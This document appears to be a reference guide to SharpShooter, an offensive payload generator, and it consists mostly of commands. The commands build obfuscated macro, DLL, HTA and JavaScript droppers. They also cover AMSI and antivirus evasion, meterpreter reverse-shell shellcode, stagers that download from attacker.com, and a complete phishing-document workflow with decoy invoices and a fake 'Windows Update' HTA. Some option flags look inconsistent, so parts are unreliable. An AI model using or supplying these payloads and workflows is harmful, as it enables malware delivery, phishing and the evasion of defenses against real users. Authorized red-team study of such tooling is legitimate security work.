SharpShooter

Overview

SharpShooter is a sophisticated payload generation framework designed for authorized penetration testers and security researchers. It creates polymorphic, obfuscated payloads across multiple formats (VBA, DotNet, JavaScript, HTA) with support for staged and stageless delivery mechanisms, encoding chains, and custom template injection.

Key Features

Multi-format Payload Generation: VBA, DotNet, JavaScript, HTA, DLL, EXE
Obfuscation Chains: Multiple encoding and obfuscation techniques
Staged/Stageless Support: Flexible deployment models
Template Injection: Customize payload behavior and appearance
Polymorphic Output: Generates unique payloads each run
AMSI/Defender Evasion: Built-in evasion techniques
Cross-platform: Linux, macOS, Windows compatible

Installation

Prerequisites

# Python 3.6+ required
python3 --version

# Install dependencies
pip3 install pycryptodome

# Optional: Install msfvenom for shellcode generation
apt-get install metasploit-framework  # Debian/Ubuntu
brew install metasploit  # macOS

Installation Methods

From GitHub

git clone https://github.com/mdsecactivebreach/SharpShooter.git
cd SharpShooter
pip3 install -r requirements.txt
python3 SharpShooter.py --help

Docker

docker pull mdsec/sharpshooter:latest
docker run -it --rm \
  -v /path/to/payloads:/payloads \
  mdsec/sharpshooter:latest \
  python3 SharpShooter.py [options]

Manual Installation

# Download release
wget https://github.com/mdsecactivebreach/SharpShooter/releases/download/v3.6/SharpShooter.zip
unzip SharpShooter.zip
cd SharpShooter
python3 SharpShooter.py --help

Core Concepts

Payload Types

Type	Format	Use Case	Capabilities
vba	VBA macro	Office documents	Full .NET execution, AMSI bypass
dll	DLL file	DLL injection, COM objects	Native code execution
exe	EXE executable	Staged delivery	Direct execution
dotnet	.NET assembly	.NET environments	Managed code execution
js	JavaScript	Web browsers, HTA	Script execution
hta	HTML Application	Windows desktop	Script + IE engine
ps1	PowerShell	Command-line	PowerShell execution

Delivery Models

Staged: Small downloader fetches full payload from C2 server
Stageless: Complete payload embedded in delivery vehicle
Mixed: Hybrid approach with modular components

Basic Usage

Simple Payload Generation

# Generate VBA macro (stageless, calc.exe PoC)
python3 SharpShooter.py -p vba -i calc

# Generate DLL payload
python3 SharpShooter.py -p dll -i calc

# Generate HTA payload
python3 SharpShooter.py -p hta -i calc

# Generate JavaScript payload
python3 SharpShooter.py -p js -i calc

Help and Options

# View all options
python3 SharpShooter.py --help

# Show examples
python3 SharpShooter.py --examples

# List available evasion techniques
python3 SharpShooter.py --list-evasions

Advanced Usage

With Shellcode (Metasploit)

# Generate msfvenom shellcode
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 \
  -f raw -o shellcode.bin

# Generate payload with msfvenom shellcode
python3 SharpShooter.py \
  -p vba \
  -s shellcode.bin \
  -c windows/meterpreter/reverse_tcp \
  -r shellcode.bin \
  -d "Download and execute payload"

Staged Payload with C2

# Generate VBA stager (downloads from C2)
python3 SharpShooter.py \
  -p vba \
  -u http://192.168.1.100:8080/payload.exe \
  -s \
  --smuggle

# Generate stager with custom headers
python3 SharpShooter.py \
  -p vba \
  -u http://attacker.com/stage2 \
  -s \
  --headers "Authorization: Bearer token123"

Obfuscation and Encoding

# VBA with maximum obfuscation
python3 SharpShooter.py \
  -p vba \
  -i calc \
  --obfuscate \
  --encode \
  --no-cleanup

# Multiple encoding passes
python3 SharpShooter.py \
  -p dll \
  -i calc \
  --base64 \
  --xor \
  --unicode

# Custom XOR key
python3 SharpShooter.py \
  -p ps1 \
  -i calc \
  --xor-key "MySecretKey123"

Custom Delivery Templates

# Use custom Word/Excel template
python3 SharpShooter.py \
  -p vba \
  -i calc \
  -t templates/custom_document.docx \
  --template-injection

# Custom HTA template
python3 SharpShooter.py \
  -p hta \
  -i calc \
  -t templates/custom.hta \
  --custom-var payload_name=MyApp

Payload Options Reference

Command Line Arguments

Argument	Short	Description	Example
`--payload`	`-p`	Payload type	vba, dll, exe, dotnet, js, hta, ps1
`--image`	`-i`	Icon/PoC file	calc, notepad, powershell
`--shellcode`	`-s`	Shellcode file	payload.bin
`--url`	`-u`	Staging URL	http://attacker.com/stage
`--domain`	`-d`	Target domain	example.com
`--output`	`-o`	Output filename	custom_payload.vba
`--obfuscate`	`-ob`	Enable obfuscation	true/false
`--encode`	`-en`	Enable encoding	true/false
`--smuggle`	`-sm`	Use HTTP smuggling	true/false
`--template`	`-t`	Custom template file	template.docx
`--resource`	`-r`	Resource file	resource.res

VBA Macro Generation

Basic VBA Payload

# Simple VBA macro (Calc PoC)
python3 SharpShooter.py -p vba -i calc -o Document.macro

# With evasion
python3 SharpShooter.py -p vba -i calc -o Macro.vba --obfuscate

# Full obfuscation chain
python3 SharpShooter.py -p vba -i calc \
  --obfuscate \
  --encode \
  --smuggle \
  -o SuperObfuscated.vba

VBA in Office Documents

# Create macro-enabled Excel file
python3 SharpShooter.py \
  -p vba \
  -i calc \
  -t templates/Excel_Template.xlsm \
  -o Workbook.xlsm

# Create Word macro document
python3 SharpShooter.py \
  -p vba \
  -i calc \
  -t templates/Word_Template.docm \
  -o Document.docm

# Custom template with decoy content
python3 SharpShooter.py \
  -p vba \
  -i calc \
  -t templates/legitimate_budget.xlsm \
  -o budget_2024.xlsm

DLL Payload Generation

Reflective DLL Injection

# Generate DLL for reflective injection
python3 SharpShooter.py \
  -p dll \
  -i calc \
  -o payload.dll

# DLL with exports (bypass detection)
python3 SharpShooter.py \
  -p dll \
  -i calc \
  --export-function "Update" \
  -o legitimate_library.dll

# Encrypted DLL payload
python3 SharpShooter.py \
  -p dll \
  -i calc \
  --encrypt \
  --encrypt-key "MyEncryptionKey" \
  -o encrypted_payload.dll

DLL Staging

# Stager DLL that downloads second stage
python3 SharpShooter.py \
  -p dll \
  -s \
  -u http://attacker.com/stage2.dll \
  -o stager.dll

# DLL with custom export
python3 SharpShooter.py \
  -p dll \
  -i calc \
  --com-mode \
  --export "DllCanUnloadNow" \
  -o com_object.dll

JavaScript/HTA Payloads

HTA (HTML Application)

# Simple HTA payload
python3 SharpShooter.py -p hta -i calc -o payload.hta

# HTA with embedded download
python3 SharpShooter.py \
  -p hta \
  -u http://attacker.com/second_stage.exe \
  -o download.hta

# HTA with custom title/decoy
python3 SharpShooter.py \
  -p hta \
  -i calc \
  --title "Windows Update Check" \
  --icon windows_update_icon.ico \
  -o WindowsUpdate.hta

JavaScript Payload

# Basic JavaScript
python3 SharpShooter.py -p js -i calc -o payload.js

# JavaScript with jQuery/Bootstrap obfuscation
python3 SharpShooter.py \
  -p js \
  -i calc \
  --obfuscate \
  --jquery \
  -o obfuscated.js

# JavaScript dropper
python3 SharpShooter.py \
  -p js \
  -u http://attacker.com/executable.exe \
  -o downloader.js

Evasion Techniques

AMSI Bypass

# VBA with AMSI bypass
python3 SharpShooter.py \
  -p vba \
  -i calc \
  --amsi-bypass \
  -o AMSIBypass.vba

# PowerShell with AMSI evasion
python3 SharpShooter.py \
  -p ps1 \
  -i calc \
  --bypass-amsi \
  --obfuscate \
  -o script.ps1

Defender/AV Evasion

# Polymorphic encoding
python3 SharpShooter.py \
  -p dll \
  -i calc \
  --polymorphic \
  --unicode \
  --junk-code \
  -o evasive.dll

# Multiple XOR passes
python3 SharpShooter.py \
  -p vba \
  -i calc \
  --xor-key "Pass1" \
  --encode \
  --base64 \
  -o multi_encoded.vba

# Junk code insertion
python3 SharpShooter.py \
  -p vba \
  -i calc \
  --junk-code \
  --junk-lines 50 \
  -o obfuscated.vba

Custom Encoding Chains

# Base64 + XOR + Base64
python3 SharpShooter.py \
  -p ps1 \
  -i calc \
  --chain base64,xor,base64 \
  --xor-key "SecretKey" \
  -o encoded.ps1

# Custom cipher
python3 SharpShooter.py \
  -p vba \
  -i calc \
  --cipher aes256 \
  --cipher-key "32CharacterEncryptionKey123456" \
  -o encrypted.vba

Payload Testing and Validation

Static Analysis Evasion

# Check entropy (helps detect obfuscation)
python3 -c "
import math
with open('payload.bin', 'rb') as f:
    data = f.read()
    entropy = -sum((data.count(bytes([i]))/len(data))*
    math.log2(data.count(bytes([i]))/len(data)) 
    for i in range(256) if data.count(bytes([i])) > 0)
    print(f'Entropy: {entropy}')
"

# Check file signatures
file payload.dll
strings payload.dll | head -20

Dynamic Testing

# Use cuckoo sandbox (local setup)
# Note: Only in authorized lab environments
python3 scripts/test_payload.py \
  --payload payload.exe \
  --sandbox cuckoo \
  --url http://cuckoo.local:8090

# Manual detonation (isolated VM)
# Only in isolated lab environment
powershell -ExecutionPolicy Bypass -File payload.ps1

Integration Examples

Macro-Enabled Document Workflow

#!/bin/bash
# Create complete phishing document

# Generate payload
python3 SharpShooter.py \
  -p vba \
  -i calc \
  --obfuscate \
  -o macro_payload.vba

# Inject into template
python3 scripts/inject_macro.py \
  --template legitimate_invoice.docx \
  --macro macro_payload.vba \
  --output invoice_2024.docx

# Create archive for distribution
zip -e phishing_package.zip invoice_2024.docx

Multi-stage Campaign

#!/bin/bash
# First stage: VBA stager
python3 SharpShooter.py \
  -p vba \
  -u http://attacker.com:8080/stage2.exe \
  -s \
  --smuggle \
  -o stage1.vba

# Second stage: Full payload
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 \
  -f exe -o stage2.exe

# Serve stages
python3 -m http.server 8080 --directory ./payloads

Configuration Files

YAML Configuration

# Create config file
cat > config.yaml << 'EOF'
payloads:
  - name: vba_calc
    type: vba
    icon: calc
    obfuscate: true
    encode: true
    output: calc_macro.vba

  - name: dll_stager
    type: dll
    url: http://attacker.com/stage2
    staging: true
    export: MyFunction
    output: stager.dll

  - name: hta_dropper
    type: hta
    url: http://attacker.com/payload.exe
    title: Windows Update
    output: update.hta
EOF

# Run batch generation
python3 scripts/batch_generate.py config.yaml

Troubleshooting

Python Dependencies

# Check dependencies
pip3 list | grep -E "pycryptodome|requests"

# Install/upgrade requirements
pip3 install -r requirements.txt --upgrade

# Fix permission issues
pip3 install --user -r requirements.txt

Payload Errors

# Verbose output for debugging
python3 SharpShooter.py -p vba -i calc -v

# Check template validity
python3 -m zipfile -l template.docx

# Validate XML (Office documents)
unzip -p template.docx word/document.xml | xmllint --format -

Encoding Issues

# Test encoding chain
python3 -c "
import base64
payload = open('shellcode.bin', 'rb').read()
encoded = base64.b64encode(payload)
print(f'Encoded length: {len(encoded)}')
print(f'Original: {len(payload)}')
"

# Verify XOR key
python3 scripts/verify_xor.py --payload encoded.bin --key "MyKey"

Best Practices

Operational Security

Always test payloads in isolated lab environments first
Use VPN/proxy when hosting payload infrastructure
Rotate payloads frequently to avoid signature detection
Use unique encoding chains per campaign
Monitor C2 infrastructure for indicators of compromise
Clean up malware samples and staging infrastructure

Legal and Ethical

Only use with explicit written authorization
Maintain detailed documentation of testing scope
Use in red team/penetration testing contexts only
Respect rules of engagement (ROE)
Report all findings to authorized contacts
Follow responsible disclosure practices

Quick Reference

Task	Command
Generate VBA macro	`python3 SharpShooter.py -p vba -i calc`
Generate DLL	`python3 SharpShooter.py -p dll -i calc`
Generate HTA	`python3 SharpShooter.py -p hta -i calc`
Staged payload	`python3 SharpShooter.py -p vba -u http://attacker.com/stage2 -s`
With obfuscation	Add `--obfuscate --encode --junk-code`
Custom output	`python3 SharpShooter.py -p vba -i calc -o custom.vba`
AMSI bypass	`python3 SharpShooter.py -p vba --amsi-bypass`

Resources

GitHub: https://github.com/mdsecactivebreach/SharpShooter
Documentation: https://www.mdsec.co.uk/
MITRE ATT&CK: Command and Control (T1071), Obfuscated Files (T1027)
Evasion Techniques: https://attack.mitre.org/tactics/TA0005/